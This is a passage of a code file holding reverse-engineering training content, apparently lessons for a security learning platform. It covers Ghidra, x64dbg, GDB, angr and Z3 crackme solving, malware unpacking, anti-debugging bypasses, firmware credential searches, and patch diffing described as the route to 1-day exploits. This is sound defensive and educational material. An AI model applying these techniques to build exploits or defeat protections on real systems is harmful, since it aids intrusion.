      { heading: "First steps with a binary", content: `\`\`\`bash\n# 1. Identify the file\nfile binary\n# binary: ELF 64-bit LSB executable, x86-64, dynamically linked\n\n# 2. Check security features\nchecksec binary   # (pwntools)\n\n# 3. Extract strings\nstrings binary | less\nstrings -e l binary   # UTF-16LE strings (Windows)\n\n# 4. List imported functions\nobjdump -T binary     # dynamic symbol table\nnm binary             # symbols (if not stripped)\n\n# 5. Disassemble\nobjdump -d -M intel binary | less\n\n# 6. Run and observe\nstrace ./binary       # system calls\nltrace ./binary       # library calls\n\`\`\``, sortOrder: 0 },
      { heading: "Ghidra basics", content: `\`\`\`\n1. Create new project → Import binary\n2. Run Auto Analysis (accept defaults)\n3. Navigate:\n   - Symbol Tree (left): functions, labels, imports\n   - Listing (center): disassembly\n   - Decompile (right): pseudo-C output\n\n4. Key operations:\n   L → rename function/variable\n   T → retype variable (change type)\n   ; → add comment\n   Ctrl+Shift+F → search for strings\n   X → show cross-references (who calls this?)\n\n5. Analysis workflow:\n   a. Start at entry/main (find via Exports or strings)\n   b. Rename functions as you understand them\n   c. Retype variables for better decompilation\n   d. Follow interesting function calls\n   e. Look for: strcmp (password checks), network calls,\n      file operations, crypto constants\n\`\`\``, sortOrder: 1 },
      { heading: "x64dbg basics (Windows)", content: `\`\`\`\n1. Open binary in x64dbg\n2. Navigate:\n   - CPU tab: disassembly + registers + stack + dump\n   - Breakpoints tab: manage breakpoints\n   - Memory Map: view loaded modules\n\n3. Key shortcuts:\n   F2: Toggle breakpoint at cursor\n   F7: Step into (follow calls)\n   F8: Step over (skip calls)\n   F9: Run\n   Ctrl+G: Go to address/function\n   Ctrl+F: Find pattern in memory\n\n4. Useful operations:\n   - Set breakpoint on API: bp CreateFileW\n   - Conditional breakpoint: check register values\n   - Hardware breakpoint: memory read/write (4 max)\n   - Trace: Log execution path to file\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- Ghidra documentation and cheat sheet\n- x64dbg: x64dbg.com\n- strace/ltrace man pages\n- OALabs YouTube channel (malware RE tutorials)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "reverse-engineering", depthTier: 2, title: "Reverse Engineering in Depth", recommendedLevel: 2,
    sections: [
      { heading: "Control flow analysis", content: `Recognizing common code patterns in assembly:\n\n\`\`\`nasm\n; if-else\ncmp eax, 5\njne .else_branch\n; if-body\njmp .end_if\n.else_branch:\n; else-body\n.end_if:\n\n; for loop (for i=0; i<10; i++)\nxor ecx, ecx          ; i = 0\n.loop_start:\ncmp ecx, 10\njge .loop_end\n; loop body\ninc ecx\njmp .loop_start\n.loop_end:\n\n; switch/jump table\nmov eax, [input]\ncmp eax, 4\nja .default           ; above max case\njmp [.jump_table + eax*8]\n.jump_table:\n  dq .case_0, .case_1, .case_2, .case_3, .case_4\n\n; function call (System V AMD64)\nmov rdi, param1       ; first argument\nmov rsi, param2       ; second argument\ncall function\n; return value in rax\n\`\`\``, sortOrder: 0 },
      { heading: "Identifying algorithms", content: `Common patterns to recognize:\n\n\`\`\`\nCryptographic constants (look in .rodata):\n- 0x67452301, 0xEFCDAB89 → MD5/SHA-1 init values\n- 0x6A09E667, 0xBB67AE85 → SHA-256 init values\n- 0x63, 0x7C, 0x77, 0x7B → AES S-box\n- 0x01000000, 0x02000000 → AES round constants\n\nString operations:\n- Byte-by-byte comparison loop → strcmp equivalent\n- XOR loop over buffer → simple decryption/encoding\n- Subtract 0x30 from each byte → ASCII digit conversion\n\nNetwork operations:\n- socket() → connect() → send()/recv() → C2 communication\n- bind() → listen() → accept() → backdoor/listener\n\`\`\`\n\n\`\`\`bash\n# Find crypto constants with YARA\nyara crypto_signatures.yar binary\n\n# Ghidra: Search → For Scalars → enter constant\n# FindCrypt plugin: automatically identifies crypto algorithms\n\`\`\``, sortOrder: 1 },
      { heading: "Dynamic analysis with GDB", content: `\`\`\`bash\n# Useful GDB + pwndbg commands for RE\ngdb ./binary\n\n# Find main even in stripped binaries\ninfo file       # entry point address\nb *0x401000     # break at entry\nr\n# Follow call chain to main\n\n# Examine data structures\nptype struct_name     # show struct definition\np *(struct_t*)0x404000  # print struct at address\n\n# Watch memory\nwatch *0x404000        # break on write\nrwatch *0x404000       # break on read\nawatch *0x404000       # break on read or write\n\n# Catch library calls\ncatch syscall write    # break on write() syscall\nb puts                 # break on puts()\ncommands                # execute commands when breakpoint hits\n  x/s $rdi             # print first argument (string)\n  continue\nend\n\n# Modify execution\nset $rax = 1           # change register\nset *0x404000 = 0x41   # change memory\njump *0x401234         # jump to address\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- pwndbg/GEF cheat sheets\n- Ghidra advanced courses (SANS FOR610)\n- YARA documentation: virustotal.github.io/yara\n- OpenSecurityTraining2: Architecture 1001 (x86-64)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "reverse-engineering", depthTier: 3, title: "Advanced Reverse Engineering", recommendedLevel: 3,
    sections: [
      { heading: "Malware unpacking", content: `Packed malware is compressed/encrypted — must be unpacked before analysis:\n\n\`\`\`bash\n# Detect packing\nDIE (Detect It Easy): identifies packer/compiler\n# High entropy (>7.0) in .text section → likely packed\n# Few imports → packed (real imports resolved at runtime)\n# Unusual section names (.UPX0, .packed) → known packer\n\n# UPX unpacking (simple case)\nupx -d packed.exe -o unpacked.exe\n\n# Manual unpacking workflow:\n# 1. Set breakpoint at the OEP (Original Entry Point)\n# 2. Run until unpacking stub finishes (watch for VirtualProtect,\n#    VirtualAlloc, then a jump to a different section)\n# 3. When at OEP: dump the process from memory\n# 4. Fix the import table (Scylla/Import Reconstructor)\n\`\`\`\n\n\`\`\`\n# In x64dbg:\n# Method 1: ESP trick (32-bit)\n# After PUSHAD, set hardware breakpoint on ESP\n# Run → breaks at POPAD → single step → OEP jump\n\n# Method 2: API breakpoint\n# bp VirtualProtect → run → observe protection changes\n# When a section changes to PAGE_EXECUTE_READ → OEP nearby\n\n# Method 3: Watch for tail jump\n# The unpacking stub ends with a far JMP to the original code\n# Look for JMP to a distant address after the unpacking loop\n\`\`\``, sortOrder: 0 },
      { heading: "Anti-debugging bypass", content: `Common anti-debug techniques and bypasses:\n\n\`\`\`c\n// IsDebuggerPresent (PEB.BeingDebugged flag)\nif (IsDebuggerPresent()) exit(1);\n// Bypass: set PEB.BeingDebugged = 0 in debugger\n// x64dbg: dump → navigate to PEB → set byte to 0\n\n// NtQueryInformationProcess\nNTSTATUS status;\nDWORD debugPort = 0;\nNtQueryInformationProcess(GetCurrentProcess(),\n    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);\nif (debugPort) exit(1);\n// Bypass: hook NtQueryInformationProcess, return 0\n\n// Timing checks\nDWORD t1 = GetTickCount();\n// ... sensitive code ...\nDWORD t2 = GetTickCount();\nif (t2 - t1 > 100) exit(1);  // too slow = debugger\n// Bypass: patch the comparison or set breakpoint after check\n\n// INT 3 detection (exception handler trick)\n__try {\n    __asm { int 3 }  // generates breakpoint exception\n    // If debugger catches it, this code runs\n    exit(1);  // debugger detected\n} __except(EXCEPTION_EXECUTE_HANDLER) {\n    // No debugger — exception handler caught it\n    // Continue normally\n}\n// Bypass: don't let debugger handle INT 3 — pass to application\n\`\`\``, sortOrder: 1 },
      { heading: "Scripting analysis with Ghidra", content: `Automate analysis with Ghidra scripts (Java or Python):\n\n\`\`\`python\n# Ghidra Python script: find all calls to a function\nfrom ghidra.program.model.symbol import SourceType\n\n# Find all references to CreateProcessA\nfunc = getGlobalFunctions(\"CreateProcessA\")\nif func:\n    refs = getReferencesTo(func[0].getEntryPoint())\n    for ref in refs:\n        caller = getFunctionContaining(ref.getFromAddress())\n        if caller:\n            print(f\"{caller.getName()} calls CreateProcessA at {ref.getFromAddress()}\")\n\n# Rename functions based on string references\nfor func in currentProgram.getFunctionManager().getFunctions(True):\n    for block in func.getBody().iterator():\n        # Check if function references interesting strings\n        refs = getReferencesFrom(block)\n        # ... analyze and rename ...\n\n# Decompile and search\nfrom ghidra.app.decompiler import DecompInterface\ndecomp = DecompInterface()\ndecomp.openProgram(currentProgram)\nfor func in currentProgram.getFunctionManager().getFunctions(True):\n    result = decomp.decompileFunction(func, 60, monitor)\n    if result.getDecompiledFunction():\n        code = result.getDecompiledFunction().getC()\n        if \"password\" in code.lower():\n            print(f\"Password reference in: {func.getName()}\")\n\`\`\``, sortOrder: 2 },
      { heading: "Sources", content: `- Practical Malware Analysis (Sikorski & Honig)\n- Ghidra scripting documentation\n- ScyllaHide: github.com/x64dbg/ScyllaHide (anti-anti-debug plugin)\n- Detect It Easy: github.com/horsicq/DIE-engine`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "reverse-engineering", depthTier: 4, title: "Expert Reverse Engineering", recommendedLevel: 4,
    sections: [
      { heading: "Binary diffing and patch analysis", content: `Compare binary versions to find patched vulnerabilities:\n\n\`\`\`bash\n# BinDiff (IDA/Ghidra plugin)\n# 1. Analyze old and new versions in IDA/Ghidra\n# 2. Export BinExport databases\n# 3. Run BinDiff → shows matched/unmatched functions\n# 4. Focus on changed functions → likely the patch\n\n# Diaphora (Ghidra plugin, free)\n# Same workflow: export both versions, diff, analyze changes\n\`\`\`\n\nPatch analysis methodology:\n1. Get the vulnerable version and the patched version\n2. Diff them — focus on changed functions\n3. Understand what the patch does (added bounds check? changed comparison?)\n4. Work backwards: if the patch adds a size check, the vulnerability was a buffer overflow\n5. Write a PoC that triggers the condition the patch prevents\n\nThis is how 1-day exploits are developed — analyzing Patch Tuesday updates to find the vulnerability before all systems are updated.`, sortOrder: 0 },
      { heading: "Symbolic execution and constraint solving", content: `Use SMT solvers to automatically find inputs that reach specific code paths:\n\n\`\`\`python\n# angr — symbolic execution framework\nimport angr\nimport claripy\n\nproj = angr.Project(\"./crackme\", auto_load_libs=False)\n\n# Create symbolic input (8 bytes)\npassword = claripy.BVS(\"password\", 8 * 8)\n\n# Start at main with symbolic stdin\nstate = proj.factory.entry_state(stdin=angr.SimPackets(password))\nsimgr = proj.factory.simulation_manager(state)\n\n# Explore: find \"Correct!\" path, avoid \"Wrong!\" path\nsimgr.explore(\n    find=lambda s: b\"Correct\" in s.posix.dumps(1),  # stdout\n    avoid=lambda s: b\"Wrong\" in s.posix.dumps(1)\n)\n\nif simgr.found:\n    solution = simgr.found[0].solver.eval(password, cast_to=bytes)\n    print(f\"Password: {solution}\")\n\`\`\`\n\n\`\`\`python\n# Z3 — constraint solver for manual analysis\nfrom z3 import *\n\n# If the check is: (input[0] ^ 0x42) + input[1] == 0x90\na, b = BitVecs(\"a b\", 8)\ns = Solver()\ns.add((a ^ 0x42) + b == 0x90)\ns.add(a >= 0x20, a <= 0x7E)  # printable ASCII\ns.add(b >= 0x20, b <= 0x7E)\nif s.check() == sat:\n    m = s.model()\n    print(f\"a={chr(m[a].as_long())}, b={chr(m[b].as_long())}\")\n\`\`\``, sortOrder: 1 },
      { heading: "Firmware reverse engineering", content: `\`\`\`bash\n# Extract firmware filesystem\nbinwalk -e firmware.bin\n# Extracts: squashfs, cramfs, JFFS2, etc.\n\n# Analyze extracted filesystem\nfind _firmware.bin.extracted/ -name \"*.conf\" -o -name \"*.sh\" | xargs grep -l password\n\n# Find hardcoded credentials\nstrings firmware.bin | grep -i \"admin\\|password\\|key\\|secret\"\n\n# Identify architecture\nfile _firmware.bin.extracted/usr/bin/httpd\n# httpd: ELF 32-bit MSB, MIPS, statically linked\n\n# Emulate with QEMU for dynamic analysis\nqemu-mips-static -L ./rootfs ./rootfs/usr/bin/httpd\n# Or full system emulation with FirmAE/FAT\n\n# Ghidra analysis\n# Set processor to MIPS/ARM/etc. matching the firmware\n# Focus on: CGI handlers, authentication functions, command execution\n\`\`\`\n\nCommon firmware vulnerabilities: command injection in web interfaces, hardcoded credentials, buffer overflows in custom network daemons, unauthenticated API endpoints.`, sortOrder: 2 },
      { heading: "Sources", content: `- angr documentation: docs.angr.io\n- Z3 documentation: github.com/Z3Prover/z3\n- BinDiff: zynamics.com/bindiff\n- FirmWalker: github.com/craigz28/firmwalker\n- EMBA: github.com/e-m-b-a/emba (firmware security analyzer)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "reverse-engineering", depthTier: 5, title: "Reverse Engineering Internals", recommendedLevel: 5,
    sections: [
      { heading: "Compiler internals and optimization patterns", content: `Recognizing compiler-generated patterns:\n\n\`\`\`nasm\n; Division by constant (compiler optimization)\n; x / 10 becomes:\nmov rax, 0xCCCCCCCCCCCCCCCD  ; magic constant\nmul rcx                       ; multiply\nshr rdx, 3                    ; shift result\n; This is faster than div instruction\n; Magic constants identify the divisor\n\n; String operations (rep prefix)\nrep movsb       ; memcpy (rcx bytes from rsi to rdi)\nrep stosb       ; memset (rcx bytes of al at rdi)\nrepne scasb     ; strlen (scan for null byte)\n\n; Stack cookie check\nmov rax, [fs:0x28]     ; Linux: read canary from TLS\nmov [rbp-8], rax       ; save on stack\n; ... function body ...\nmov rax, [rbp-8]       ; retrieve canary\nxor rax, [fs:0x28]     ; compare with original\njne __stack_chk_fail   ; mismatch → stack corruption\n\n; C++ virtual function call\nmov rax, [rcx]         ; load vtable pointer from object\ncall [rax+0x18]        ; call third virtual method\n; rcx = this pointer, [rcx] = vtable, [rax+N] = N-th method\n\`\`\``, sortOrder: 0 },
      { heading: "Obfuscation internals", content: `Advanced obfuscation techniques encountered in malware:\n\n**Control flow flattening**: All basic blocks at the same level, a dispatcher selects the next block:\n\`\`\`\n// Original: if (x) { A; } else { B; } C;\n// Flattened:\nstate = 1;\nwhile (state != 0) {\n    switch (state) {\n        case 1: state = x ? 2 : 3; break;\n        case 2: A; state = 4; break;\n        case 3: B; state = 4; break;\n        case 4: C; state = 0; break;\n    }\n}\n\`\`\`\n\n**Opaque predicates**: Conditions that always evaluate the same way but are hard for static analysis to prove:\n\`\`\`nasm\n; x*(x+1) is always even, so this always jumps:\nmov eax, [ebx]\nimul eax, eax\nadd eax, [ebx]\ntest eax, 1\njz .real_code    ; always taken, but static analysis can't prove it\njmp .dead_code   ; never executed\n\`\`\`\n\n**Mixed Boolean-Arithmetic (MBA)**: Replace simple operations with equivalent but complex expressions:\n\`\`\`\n// x + y becomes:\n(x & y) * 2 + (x ^ y)\n// Equivalent but harder to recognize\n\`\`\`\n\nDeobfuscation: symbolic execution (angr, Triton), pattern matching, or trace-based simplification.`, sortOrder: 1 },
      { heading: "Intermediate representations for analysis", content: `Advanced tools lift machine code to an IR for analysis:\n\n**VEX IR** (used by angr/Valgrind):\n\`\`\`\n; x86: add eax, ebx\n; VEX:\nt3 = GET:I32(offset=8)    # eax\nt4 = GET:I32(offset=12)   # ebx\nt5 = Add32(t3, t4)\nPUT(offset=8) = t5        # eax = result\n\`\`\`\n\n**LLVM IR** (used by RetDec, McSema):\n\`\`\`llvm\n; Lifting x86 to LLVM IR enables:\n; - Standard compiler optimizations for deobfuscation\n; - Recompilation to a different architecture\n; - Integration with LLVM-based analysis tools\n\n%result = add i32 %eax, %ebx\nstore i32 %result, i32* @eax\n\`\`\`\n\n**Binary Analysis Platform (BAP)** uses BIL (BAP Intermediate Language):\n\`\`\`\nRAX := RAX + RBX\nCF := RAX < old_RAX   ; carry flag\n\`\`\`\n\nIRs enable architecture-independent analysis: write one analysis pass that works on x86, ARM, MIPS, and any other lifted architecture.`, sortOrder: 2 },
      { heading: "Sources", content: `- angr documentation: docs.angr.io (VEX IR reference)\n- RetDec: github.com/avast/retdec (LLVM-based decompiler)\n- Binary Ninja: binary.ninja (custom LLVM-like IR)\n- Trail of Bits: "Lifting Machine Code to LLVM IR"\n- Rolf Rolles, "Practical Malware Analysis with Obfuscated Code"`, sortOrder: 3 },
    ],
  },
];
